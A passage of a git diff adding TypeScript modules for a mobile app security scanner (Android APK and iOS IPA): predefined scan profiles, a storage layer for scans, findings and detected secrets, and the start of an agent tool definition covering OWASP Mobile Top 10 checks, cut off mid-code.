+ * Pre-defined scan profiles for different mobile application testing scenarios.
+ *
+ * @module pentest/mobilescan/profiles
+ */
+
+import { MobileScanTypes } from "./types"
+
+/**
+ * Mobile scan profiles namespace.
+ */
+export namespace MobileScanProfiles {
+  /**
+   * Discovery profile - manifest and basic analysis only.
+   */
+  export const Discovery: MobileScanTypes.ScanProfile = {
+    id: "discovery",
+    name: "Discovery",
+    description: "Quick manifest analysis without decompilation",
+    staticAnalysis: {
+      manifest: true,
+      permissions: true,
+      components: true,
+      network: false,
+      crypto: false,
+      storage: false,
+      secrets: false,
+      sslPinning: false,
+      rootDetection: false,
+      obfuscation: false,
+      libraries: false,
+      urls: false,
+    },
+    decompile: {
+      enabled: false,
+      decompileResources: false,
+      decompileSources: false,
+      cleanupOnComplete: true,
+    },
+    externalTools: {
+      apktool: true,
+      jadx: false,
+      mobsf: false,
+      androguard: false,
+      frida: false,
+      objection: false,
+    },
+    timeout: 60000,
+    maxFileSize: 500 * 1024 * 1024,
+  }
+
+  /**
+   * Quick profile - fast scan for critical issues.
+   */
+  export const Quick: MobileScanTypes.ScanProfile = {
+    id: "quick",
+    name: "Quick",
+    description: "Fast scan for critical security issues",
+    staticAnalysis: {
+      manifest: true,
+      permissions: true,
+      components: true,
+      network: true,
+      crypto: false,
+      storage: false,
+      secrets: true,
+      sslPinning: false,
+      rootDetection: false,
+      obfuscation: false,
+      libraries: false,
+      urls: true,
+    },
+    decompile: {
+      enabled: false,
+      decompileResources: true,
+      decompileSources: false,
+      cleanupOnComplete: true,
+    },
+    externalTools: {
+      apktool: true,
+      jadx: false,
+      mobsf: false,
+      androguard: false,
+      frida: false,
+      objection: false,
+    },
+    timeout: 120000,
+    maxFileSize: 500 * 1024 * 1024,
+  }
+
+  /**
+   * Standard profile - balanced comprehensive scan.
+   */
+  export const Standard: MobileScanTypes.ScanProfile = {
+    id: "standard",
+    name: "Standard",
+    description: "Balanced scan with full static analysis",
+    staticAnalysis: {
+      manifest: true,
+      permissions: true,
+      components: true,
+      network: true,
+      crypto: true,
+      storage: true,
+      secrets: true,
+      sslPinning: true,
+      rootDetection: true,
+      obfuscation: true,
+      libraries: true,
+      urls: true,
+    },
+    decompile: {
+      enabled: true,
+      decompileResources: true,
+      decompileSources: true,
+      cleanupOnComplete: true,
+    },
+    externalTools: {
+      apktool: true,
+      jadx: true,
+      mobsf: false,
+      androguard: false,
+      frida: false,
+      objection: false,
+    },
+    timeout: 300000,
+    maxFileSize: 500 * 1024 * 1024,
+  }
+
+  /**
+   * Thorough profile - comprehensive analysis with all tools.
+   */
+  export const Thorough: MobileScanTypes.ScanProfile = {
+    id: "thorough",
+    name: "Thorough",
+    description: "Comprehensive analysis with all available tools",
+    staticAnalysis: {
+      manifest: true,
+      permissions: true,
+      components: true,
+      network: true,
+      crypto: true,
+      storage: true,
+      secrets: true,
+      sslPinning: true,
+      rootDetection: true,
+      obfuscation: true,
+      libraries: true,
+      urls: true,
+    },
+    decompile: {
+      enabled: true,
+      decompileResources: true,
+      decompileSources: true,
+      cleanupOnComplete: false,
+    },
+    externalTools: {
+      apktool: true,
+      jadx: true,
+      mobsf: true,
+      androguard: true,
+      frida: false,
+      objection: false,
+    },
+    timeout: 600000,
+    maxFileSize: 1024 * 1024 * 1024,
+  }
+
+  /**
+   * Compliance profile - OWASP Mobile Top 10 focused.
+   */
+  export const Compliance: MobileScanTypes.ScanProfile = {
+    id: "compliance",
+    name: "Compliance",
+    description: "OWASP Mobile Top 10 compliance assessment",
+    staticAnalysis: {
+      manifest: true,
+      permissions: true,
+      components: true,
+      network: true,
+      crypto: true,
+      storage: true,
+      secrets: true,
+      sslPinning: true,
+      rootDetection: true,
+      obfuscation: true,
+      libraries: true,
+      urls: true,
+    },
+    decompile: {
+      enabled: true,
+      decompileResources: true,
+      decompileSources: true,
+      cleanupOnComplete: true,
+    },
+    externalTools: {
+      apktool: true,
+      jadx: true,
+      mobsf: true,
+      androguard: false,
+      frida: false,
+      objection: false,
+    },
+    timeout: 600000,
+    maxFileSize: 500 * 1024 * 1024,
+  }
+
+  /**
+   * Custom profile template.
+   */
+  export const Custom: MobileScanTypes.ScanProfile = {
+    id: "custom",
+    name: "Custom",
+    description: "User-configurable scan profile",
+    staticAnalysis: {
+      manifest: true,
+      permissions: true,
+      components: true,
+      network: true,
+      crypto: true,
+      storage: true,
+      secrets: true,
+      sslPinning: true,
+      rootDetection: true,
+      obfuscation: true,
+      libraries: true,
+      urls: true,
+    },
+    decompile: {
+      enabled: true,
+      decompileResources: true,
+      decompileSources: true,
+      cleanupOnComplete: true,
+    },
+    externalTools: {
+      apktool: true,
+      jadx: true,
+      mobsf: false,
+      androguard: false,
+      frida: false,
+      objection: false,
+    },
+    timeout: 300000,
+    maxFileSize: 500 * 1024 * 1024,
+  }
+
+  /**
+   * All available profiles.
+   */
+  export const All: Record<MobileScanTypes.ProfileId, MobileScanTypes.ScanProfile> = {
+    discovery: Discovery,
+    quick: Quick,
+    standard: Standard,
+    thorough: Thorough,
+    compliance: Compliance,
+    custom: Custom,
+  }
+
+  /**
+   * Get a profile by ID.
+   */
+  export function get(id: MobileScanTypes.ProfileId): MobileScanTypes.ScanProfile | undefined {
+    return All[id]
+  }
+
+  /**
+   * List all profiles.
+   */
+  export function list(): MobileScanTypes.ScanProfile[] {
+    return Object.values(All)
+  }
+
+  /**
+   * Create a custom profile with overrides.
+   */
+  export function createCustom(
+    base: MobileScanTypes.ProfileId,
+    overrides: Partial<Omit<MobileScanTypes.ScanProfile, "id">>
+  ): MobileScanTypes.ScanProfile {
+    const baseProfile = get(base) || Custom
+    return {
+      ...baseProfile,
+      ...overrides,
+      id: "custom",
+      staticAnalysis: { ...baseProfile.staticAnalysis, ...overrides.staticAnalysis },
+      decompile: { ...baseProfile.decompile, ...overrides.decompile },
+      externalTools: { ...baseProfile.externalTools, ...overrides.externalTools },
+    }
+  }
+
+  /**
+   * Format profile for display.
+   */
+  export function format(profile: MobileScanTypes.ScanProfile): string {
+    const lines: string[] = []
+    lines.push(`Profile: ${profile.name} (${profile.id})`)
+    lines.push(`Description: ${profile.description}`)
+    lines.push("")
+
+    lines.push("Static Analysis:")
+    lines.push(`  Manifest: ${profile.staticAnalysis.manifest ? "Yes" : "No"}`)
+    lines.push(`  Permissions: ${profile.staticAnalysis.permissions ? "Yes" : "No"}`)
+    lines.push(`  Components: ${profile.staticAnalysis.components ? "Yes" : "No"}`)
+    lines.push(`  Network: ${profile.staticAnalysis.network ? "Yes" : "No"}`)
+    lines.push(`  Crypto: ${profile.staticAnalysis.crypto ? "Yes" : "No"}`)
+    lines.push(`  Storage: ${profile.staticAnalysis.storage ? "Yes" : "No"}`)
+    lines.push(`  Secrets: ${profile.staticAnalysis.secrets ? "Yes" : "No"}`)
+    lines.push(`  SSL Pinning: ${profile.staticAnalysis.sslPinning ? "Yes" : "No"}`)
+    lines.push(`  Root Detection: ${profile.staticAnalysis.rootDetection ? "Yes" : "No"}`)
+    lines.push(`  Obfuscation: ${profile.staticAnalysis.obfuscation ? "Yes" : "No"}`)
+    lines.push(`  Libraries: ${profile.staticAnalysis.libraries ? "Yes" : "No"}`)
+    lines.push(`  URLs: ${profile.staticAnalysis.urls ? "Yes" : "No"}`)
+
+    lines.push("")
+    lines.push("Decompilation:")
+    lines.push(`  Enabled: ${profile.decompile.enabled ? "Yes" : "No"}`)
+    if (profile.decompile.enabled) {
+      lines.push(`  Resources: ${profile.decompile.decompileResources ? "Yes" : "No"}`)
+      lines.push(`  Sources: ${profile.decompile.decompileSources ? "Yes" : "No"}`)
+      lines.push(`  Cleanup: ${profile.decompile.cleanupOnComplete ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("External Tools:")
+    lines.push(`  APKTool: ${profile.externalTools.apktool ? "Yes" : "No"}`)
+    lines.push(`  JADX: ${profile.externalTools.jadx ? "Yes" : "No"}`)
+    lines.push(`  MobSF: ${profile.externalTools.mobsf ? "Yes" : "No"}`)
+    lines.push(`  Androguard: ${profile.externalTools.androguard ? "Yes" : "No"}`)
+    lines.push(`  Frida: ${profile.externalTools.frida ? "Yes" : "No"}`)
+    lines.push(`  Objection: ${profile.externalTools.objection ? "Yes" : "No"}`)
+
+    lines.push("")
+    lines.push(`Timeout: ${profile.timeout}ms`)
+    lines.push(`Max File Size: ${Math.round(profile.maxFileSize / (1024 * 1024))}MB`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format all profiles as a summary table.
+   */
+  export function formatTable(): string {
+    const lines: string[] = []
+    lines.push("| Profile | Static | Decompile | Tools | Use Case |")
+    lines.push("|---------|--------|-----------|-------|----------|")
+
+    for (const profile of list()) {
+      const staticCount = Object.values(profile.staticAnalysis).filter(Boolean).length
+      const staticLevel = staticCount >= 10 ? "full" : staticCount >= 5 ? "partial" : "basic"
+      const decompile = profile.decompile.enabled
+        ? profile.decompile.decompileSources
+          ? "full"
+          : "resources"
+        : "-"
+      const tools: string[] = []
+      if (profile.externalTools.apktool) tools.push("apktool")
+      if (profile.externalTools.jadx) tools.push("jadx")
+      if (profile.externalTools.mobsf) tools.push("mobsf")
+      if (profile.externalTools.androguard) tools.push("androguard")
+      const toolsStr = tools.length > 0 ? tools.slice(0, 2).join(", ") + (tools.length > 2 ? "..." : "") : "-"
+
+      lines.push(`| ${profile.id} | ${staticLevel} | ${decompile} | ${toolsStr} | ${profile.description} |`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get recommended profile based on requirements.
+   */
+  export function recommend(options: {
+    quickScan?: boolean
+    compliance?: boolean
+    fullDecompile?: boolean
+  }): MobileScanTypes.ScanProfile {
+    if (options.compliance) {
+      return Compliance
+    }
+    if (options.fullDecompile) {
+      return Thorough
+    }
+    if (options.quickScan) {
+      return Quick
+    }
+    return Standard
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/storage.ts b/packages/opencode/src/pentest/mobilescan/storage.ts
new file mode 100644
index 00000000000..195145115c4
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/storage.ts
@@ -0,0 +1,635 @@
+/**
+ * @fileoverview Mobile Scan Storage
+ *
+ * Storage helpers for mobile scan results, apps, and findings.
+ *
+ * @module pentest/mobilescan/storage
+ */
+
+import { randomBytes } from "crypto"
+import { Storage } from "../../storage/storage"
+import { MobileScanTypes } from "./types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "mobilescan.storage" })
+
+/**
+ * Generate a unique scan ID.
+ */
+function generateScanId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `mobilescan_${timestamp}_${random}`
+}
+
+/**
+ * Generate a unique app ID.
+ */
+function generateAppId(hash: string): string {
+  return `app_${hash.substring(0, 16)}`
+}
+
+/**
+ * Generate a unique finding ID.
+ */
+function generateFindingId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(4).toString("hex")
+  return `finding_${timestamp}_${random}`
+}
+
+/**
+ * Generate a unique secret ID.
+ */
+function generateSecretId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(4).toString("hex")
+  return `secret_${timestamp}_${random}`
+}
+
+/**
+ * Storage configuration.
+ */
+export interface StorageConfig {
+  storage?: "file" | "memory"
+}
+
+/**
+ * Mobile scan storage namespace.
+ */
+export namespace MobileScanStorage {
+  /** In-memory buffers for testing */
+  const scanBuffer: MobileScanTypes.MobileScanResult[] = []
+  const appBuffer: MobileScanTypes.MobileApp[] = []
+  const findingBuffer: MobileScanTypes.MobileFinding[] = []
+  const secretBuffer: MobileScanTypes.ExtractedSecret[] = []
+
+  // ========== Scan Results ==========
+
+  /**
+   * Save a scan result.
+   */
+  export async function saveScan(
+    result: Omit<MobileScanTypes.MobileScanResult, "id"> | MobileScanTypes.MobileScanResult,
+    config: StorageConfig = {}
+  ): Promise<MobileScanTypes.MobileScanResult> {
+    const full: MobileScanTypes.MobileScanResult = {
+      ...result,
+      id: "id" in result && result.id ? result.id : generateScanId(),
+    }
+    const validated = MobileScanTypes.MobileScanResult.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = scanBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        scanBuffer[existingIdx] = validated
+      } else {
+        scanBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "mobilescan", "scans", validated.id], validated)
+    }
+
+    log.info("Mobile scan saved", {
+      id: validated.id,
+      appId: validated.appId,
+      platform: validated.platform,
+      profile: validated.profile,
+      findingsCount: validated.findings.length,
+    })
+    return validated
+  }
+
+  /**
+   * Get a scan result by ID.
+   */
+  export async function getScan(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<MobileScanTypes.MobileScanResult | null> {
+    if (config.storage === "memory") {
+      return scanBuffer.find((s) => s.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<MobileScanTypes.MobileScanResult>(["pentest", "mobilescan", "scans", id])
+      return MobileScanTypes.MobileScanResult.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List scan results with filters.
+   */
+  export async function listScans(
+    config: StorageConfig = {},
+    filters?: {
+      appId?: string
+      platform?: MobileScanTypes.Platform
+      profile?: MobileScanTypes.ProfileId
+      status?: MobileScanTypes.Status
+      limit?: number
+    }
+  ): Promise<MobileScanTypes.MobileScanResult[]> {
+    let scans: MobileScanTypes.MobileScanResult[]
+
+    if (config.storage === "memory") {
+      scans = [...scanBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "mobilescan", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<MobileScanTypes.MobileScanResult>(key)
+          scans.push(MobileScanTypes.MobileScanResult.parse(data))
+        } catch {
+          log.warn("Failed to parse scan file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.appId) {
+      scans = scans.filter((s) => s.appId === filters.appId)
+    }
+    if (filters?.platform) {
+      scans = scans.filter((s) => s.platform === filters.platform)
+    }
+    if (filters?.profile) {
+      scans = scans.filter((s) => s.profile === filters.profile)
+    }
+    if (filters?.status) {
+      scans = scans.filter((s) => s.status === filters.status)
+    }
+
+    // Sort by start time (newest first)
+    scans.sort((a, b) => b.startTime - a.startTime)
+
+    // Apply limit
+    if (filters?.limit) {
+      scans = scans.slice(0, filters.limit)
+    }
+
+    return scans
+  }
+
+  /**
+   * Delete a scan result.
+   */
+  export async function deleteScan(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = scanBuffer.findIndex((s) => s.id === id)
+      if (idx >= 0) {
+        scanBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "mobilescan", "scans", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  // ========== Mobile Apps ==========
+
+  /**
+   * Save a mobile app.
+   */
+  export async function saveApp(
+    app: Omit<MobileScanTypes.MobileApp, "id"> | MobileScanTypes.MobileApp,
+    config: StorageConfig = {}
+  ): Promise<MobileScanTypes.MobileApp> {
+    const full: MobileScanTypes.MobileApp = {
+      ...app,
+      id: "id" in app && app.id ? app.id : generateAppId(app.fileHash),
+    }
+    const validated = MobileScanTypes.MobileApp.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = appBuffer.findIndex((a) => a.id === validated.id)
+      if (existingIdx >= 0) {
+        appBuffer[existingIdx] = validated
+      } else {
+        appBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "mobilescan", "apps", validated.id], validated)
+    }
+
+    log.info("Mobile app saved", {
+      id: validated.id,
+      platform: validated.platform,
+      packageName: validated.packageName,
+      version: validated.version,
+    })
+    return validated
+  }
+
+  /**
+   * Get a mobile app by ID.
+   */
+  export async function getApp(id: string, config: StorageConfig = {}): Promise<MobileScanTypes.MobileApp | null> {
+    if (config.storage === "memory") {
+      return appBuffer.find((a) => a.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<MobileScanTypes.MobileApp>(["pentest", "mobilescan", "apps", id])
+      return MobileScanTypes.MobileApp.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * Get a mobile app by file hash.
+   */
+  export async function getAppByHash(
+    hash: string,
+    config: StorageConfig = {}
+  ): Promise<MobileScanTypes.MobileApp | null> {
+    if (config.storage === "memory") {
+      return appBuffer.find((a) => a.fileHash === hash) || null
+    }
+
+    const apps = await listApps(config)
+    return apps.find((a) => a.fileHash === hash) || null
+  }
+
+  /**
+   * List mobile apps with filters.
+   */
+  export async function listApps(
+    config: StorageConfig = {},
+    filters?: {
+      platform?: MobileScanTypes.Platform
+      packageName?: string
+      limit?: number
+    }
+  ): Promise<MobileScanTypes.MobileApp[]> {
+    let apps: MobileScanTypes.MobileApp[]
+
+    if (config.storage === "memory") {
+      apps = [...appBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "mobilescan", "apps"])
+      apps = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<MobileScanTypes.MobileApp>(key)
+          apps.push(MobileScanTypes.MobileApp.parse(data))
+        } catch {
+          log.warn("Failed to parse app file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.platform) {
+      apps = apps.filter((a) => a.platform === filters.platform)
+    }
+    if (filters?.packageName) {
+      apps = apps.filter((a) => a.packageName === filters.packageName)
+    }
+
+    // Sort by analyzed time (newest first)
+    apps.sort((a, b) => b.analyzedAt - a.analyzedAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      apps = apps.slice(0, filters.limit)
+    }
+
+    return apps
+  }
+
+  /**
+   * Delete a mobile app.
+   */
+  export async function deleteApp(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = appBuffer.findIndex((a) => a.id === id)
+      if (idx >= 0) {
+        appBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "mobilescan", "apps", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  // ========== Findings ==========
+
+  /**
+   * Save a finding.
+   */
+  export async function saveFinding(
+    finding: Omit<MobileScanTypes.MobileFinding, "id"> | MobileScanTypes.MobileFinding,
+    config: StorageConfig = {}
+  ): Promise<MobileScanTypes.MobileFinding> {
+    const full: MobileScanTypes.MobileFinding = {
+      ...finding,
+      id: "id" in finding && finding.id ? finding.id : generateFindingId(),
+    }
+    const validated = MobileScanTypes.MobileFinding.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = findingBuffer.findIndex((f) => f.id === validated.id)
+      if (existingIdx >= 0) {
+        findingBuffer[existingIdx] = validated
+      } else {
+        findingBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "mobilescan", "findings", validated.id], validated)
+    }
+
+    log.info("Finding saved", {
+      id: validated.id,
+      scanId: validated.scanId,
+      severity: validated.severity,
+      owaspMobile: validated.owaspMobile,
+    })
+    return validated
+  }
+
+  /**
+   * Get a finding by ID.
+   */
+  export async function getFinding(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<MobileScanTypes.MobileFinding | null> {
+    if (config.storage === "memory") {
+      return findingBuffer.find((f) => f.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<MobileScanTypes.MobileFinding>(["pentest", "mobilescan", "findings", id])
+      return MobileScanTypes.MobileFinding.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List findings with filters.
+   */
+  export async function listFindings(
+    config: StorageConfig = {},
+    filters?: {
+      scanId?: string
+      appId?: string
+      platform?: MobileScanTypes.Platform
+      severity?: MobileScanTypes.Severity
+      owaspMobile?: MobileScanTypes.OwaspMobile
+      limit?: number
+    }
+  ): Promise<MobileScanTypes.MobileFinding[]> {
+    let findings: MobileScanTypes.MobileFinding[]
+
+    if (config.storage === "memory") {
+      findings = [...findingBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "mobilescan", "findings"])
+      findings = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<MobileScanTypes.MobileFinding>(key)
+          findings.push(MobileScanTypes.MobileFinding.parse(data))
+        } catch {
+          log.warn("Failed to parse finding file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.scanId) {
+      findings = findings.filter((f) => f.scanId === filters.scanId)
+    }
+    if (filters?.appId) {
+      findings = findings.filter((f) => f.appId === filters.appId)
+    }
+    if (filters?.platform) {
+      findings = findings.filter((f) => f.platform === filters.platform)
+    }
+    if (filters?.severity) {
+      findings = findings.filter((f) => f.severity === filters.severity)
+    }
+    if (filters?.owaspMobile) {
+      findings = findings.filter((f) => f.owaspMobile === filters.owaspMobile)
+    }
+
+    // Sort by severity (critical first) then by detection time
+    const severityOrder: Record<MobileScanTypes.Severity, number> = {
+      critical: 0,
+      high: 1,
+      medium: 2,
+      low: 3,
+      info: 4,
+    }
+    findings.sort((a, b) => {
+      const severityDiff = severityOrder[a.severity] - severityOrder[b.severity]
+      if (severityDiff !== 0) return severityDiff
+      return b.detectedAt - a.detectedAt
+    })
+
+    // Apply limit
+    if (filters?.limit) {
+      findings = findings.slice(0, filters.limit)
+    }
+
+    return findings
+  }
+
+  /**
+   * Delete a finding.
+   */
+  export async function deleteFinding(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = findingBuffer.findIndex((f) => f.id === id)
+      if (idx >= 0) {
+        findingBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "mobilescan", "findings", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  // ========== Secrets ==========
+
+  /**
+   * Save a secret.
+   */
+  export async function saveSecret(
+    secret: Omit<MobileScanTypes.ExtractedSecret, "id"> | MobileScanTypes.ExtractedSecret,
+    config: StorageConfig = {}
+  ): Promise<MobileScanTypes.ExtractedSecret> {
+    const full: MobileScanTypes.ExtractedSecret = {
+      ...secret,
+      id: "id" in secret && secret.id ? secret.id : generateSecretId(),
+    }
+    const validated = MobileScanTypes.ExtractedSecret.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = secretBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        secretBuffer[existingIdx] = validated
+      } else {
+        secretBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "mobilescan", "secrets", validated.id], validated)
+    }
+
+    log.info("Secret saved", {
+      id: validated.id,
+      type: validated.type,
+      confidence: validated.confidence,
+    })
+    return validated
+  }
+
+  /**
+   * List secrets with filters.
+   */
+  export async function listSecrets(
+    config: StorageConfig = {},
+    filters?: {
+      type?: MobileScanTypes.SecretType
+      confidence?: "high" | "medium" | "low"
+      limit?: number
+    }
+  ): Promise<MobileScanTypes.ExtractedSecret[]> {
+    let secrets: MobileScanTypes.ExtractedSecret[]
+
+    if (config.storage === "memory") {
+      secrets = [...secretBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "mobilescan", "secrets"])
+      secrets = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<MobileScanTypes.ExtractedSecret>(key)
+          secrets.push(MobileScanTypes.ExtractedSecret.parse(data))
+        } catch {
+          log.warn("Failed to parse secret file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.type) {
+      secrets = secrets.filter((s) => s.type === filters.type)
+    }
+    if (filters?.confidence) {
+      secrets = secrets.filter((s) => s.confidence === filters.confidence)
+    }
+
+    // Sort by confidence (high first)
+    const confidenceOrder: Record<string, number> = { high: 0, medium: 1, low: 2 }
+    secrets.sort((a, b) => confidenceOrder[a.confidence] - confidenceOrder[b.confidence])
+
+    // Apply limit
+    if (filters?.limit) {
+      secrets = secrets.slice(0, filters.limit)
+    }
+
+    return secrets
+  }
+
+  // ========== Memory Management ==========
+
+  /**
+   * Clear memory buffers (testing).
+   */
+  export function clearMemory(): void {
+    scanBuffer.length = 0
+    appBuffer.length = 0
+    findingBuffer.length = 0
+    secretBuffer.length = 0
+  }
+
+  /**
+   * Get memory counts (testing).
+   */
+  export function memoryCount(): {
+    scans: number
+    apps: number
+    findings: number
+    secrets: number
+  } {
+    return {
+      scans: scanBuffer.length,
+      apps: appBuffer.length,
+      findings: findingBuffer.length,
+      secrets: secretBuffer.length,
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  /**
+   * Generate unique scan ID (exported for orchestrator).
+   */
+  export function createScanId(): string {
+    return generateScanId()
+  }
+
+  /**
+   * Generate unique app ID (exported for orchestrator).
+   */
+  export function createAppId(hash: string): string {
+    return generateAppId(hash)
+  }
+
+  /**
+   * Generate unique finding ID (exported for orchestrator).
+   */
+  export function createFindingId(): string {
+    return generateFindingId()
+  }
+
+  /**
+   * Generate unique secret ID (exported for orchestrator).
+   */
+  export function createSecretId(): string {
+    return generateSecretId()
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/tool.ts b/packages/opencode/src/pentest/mobilescan/tool.ts
new file mode 100644
index 00000000000..ed2c71342c6
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/tool.ts
@@ -0,0 +1,1113 @@
+/**
+ * @fileoverview Mobile Scanner Tool
+ *
+ * Agent-facing tool for mobile application security analysis.
+ *
+ * @module pentest/mobilescan/tool
+ */
+
+import z from "zod"
+import { Tool } from "../../tool/tool"
+import { MobileScanTypes } from "./types"
+import { MobileScanProfiles } from "./profiles"
+import { MobileScanOrchestrator } from "./orchestrator"
+
+/**
+ * Tool parameter schema.
+ */
+const ParameterSchema = z.object({
+  action: z.enum([
+    "analyze",
+    "quick-scan",
+    "manifest",
+    "permissions",
+    "network",
+    "storage",
+    "crypto",
+    "secrets",
+    "ssl-pinning",
+    "binary",
+    "components",
+    "decompile",
+    "sbom",
+    "status",
+    "apps",
+    "findings",
+    "profiles",
+  ]),
+  file: z.string().optional(),
+  profile: z.enum(["discovery", "quick", "standard", "thorough", "compliance", "custom"]).optional(),
+  scanId: z.string().optional(),
+  appId: z.string().optional(),
+  outputDir: z.string().optional(),
+  mobsfUrl: z.string().optional(),
+  mobsfApiKey: z.string().optional(),
+  severity: z.enum(["critical", "high", "medium", "low", "info"]).optional(),
+  owaspMobile: z.string().optional(),
+  category: z.string().optional(),
+})
+
+type Parameters = z.infer<typeof ParameterSchema>
+
+/**
+ * Mobile Scanner Tool.
+ */
+export const MobileScanTool = Tool.define("mobilescan", async () => {
+  return {
+    description: `Mobile application security scanner for Android APK and iOS IPA files.
+
+Actions:
+- analyze: Full analysis with specified profile
+- quick-scan: Fast scan for critical issues only
+- manifest: Analyze AndroidManifest.xml or Info.plist
+- permissions: Permission analysis
+- network: Network security configuration analysis
+- storage: Data storage security analysis
+- crypto: Cryptographic implementation review
+- secrets: Hardcoded secrets/API key detection
+- ssl-pinning: Certificate pinning detection
+- binary: Binary protection analysis
+- components: Exported components analysis (Android)
+- decompile: Decompile APK/IPA for manual review
+- sbom: Generate software bill of materials
+- status: Get scan status
+- apps: List analyzed apps
+- findings: Get findings for a scan
+- profiles: List available scan profiles
+
+Profiles: discovery, quick, standard, thorough, compliance
+
+OWASP Mobile Top 10 2024 Coverage:
+- M1: Improper Credential Usage
+- M2: Inadequate Supply Chain Security
+- M3: Insecure Authentication/Authorization
+- M4: Insufficient Input/Output Validation
+- M5: Insecure Communication
+- M6: Inadequate Privacy Controls
+- M7: Insufficient Binary Protections
+- M8: Security Misconfiguration
+- M9: Insecure Data Storage
+- M10: Insufficient Cryptography`,
+
+    parameters: ParameterSchema,
+
+    async execute(params: Parameters): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+      const makeResult = (title: string, output: string, metadata: Record<string, unknown> = {}) => ({
+        title,
+        output,
+        metadata,
+      })
+
+      switch (params.action) {
+        case "profiles":
+          return makeResult("List scan profiles", MobileScanProfiles.formatTable())
+
+        case "status":
+          if (!params.scanId) {
+            return makeResult("Get scan status", "Error: scanId is required for status action")
+          }
+          const scan = await MobileScanOrchestrator.getStatus(params.scanId)
+          if (!scan) {
+            return makeResult("Get scan status", `Scan ${params.scanId} not found`)
+          }
+          return makeResult("Get scan status", formatScanResult(scan), { scanId: params.scanId, status: scan.status })
+
+        case "apps":
+          const apps = await MobileScanOrchestrator.listApps()
+          return makeResult("List analyzed apps", formatApps(apps), { count: apps.length })
+
+        case "findings":
+          if (!params.scanId) {
+            return makeResult("Get findings", "Error: scanId is required for findings action")
+          }
+          const findings = await MobileScanOrchestrator.getFindings(params.scanId, undefined, {
+            severity: params.severity as MobileScanTypes.Severity,
+            owaspMobile: params.owaspMobile as MobileScanTypes.OwaspMobile,
+            category: params.category,
+          })
+          return makeResult("Get findings", formatFindings(findings), { scanId: params.scanId, count: findings.length })
+
+        case "analyze":
+          if (!params.file) {
+            return makeResult("Analyze app", "Error: file path is required for analyze action")
+          }
+          const analyzeResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: params.profile as MobileScanTypes.ProfileId,
+            outputDir: params.outputDir,
+            mobsfUrl: params.mobsfUrl,
+            mobsfApiKey: params.mobsfApiKey,
+          })
+          return makeResult(
+            "Analyze app",
+            formatScanResult(analyzeResult),
+            { scanId: analyzeResult.id, appId: analyzeResult.appId, platform: analyzeResult.platform, profile: params.profile }
+          )
+
+        case "quick-scan":
+          if (!params.file) {
+            return makeResult("Quick scan", "Error: file path is required for quick-scan action")
+          }
+          const quickResult = await MobileScanOrchestrator.quickScan(params.file, {
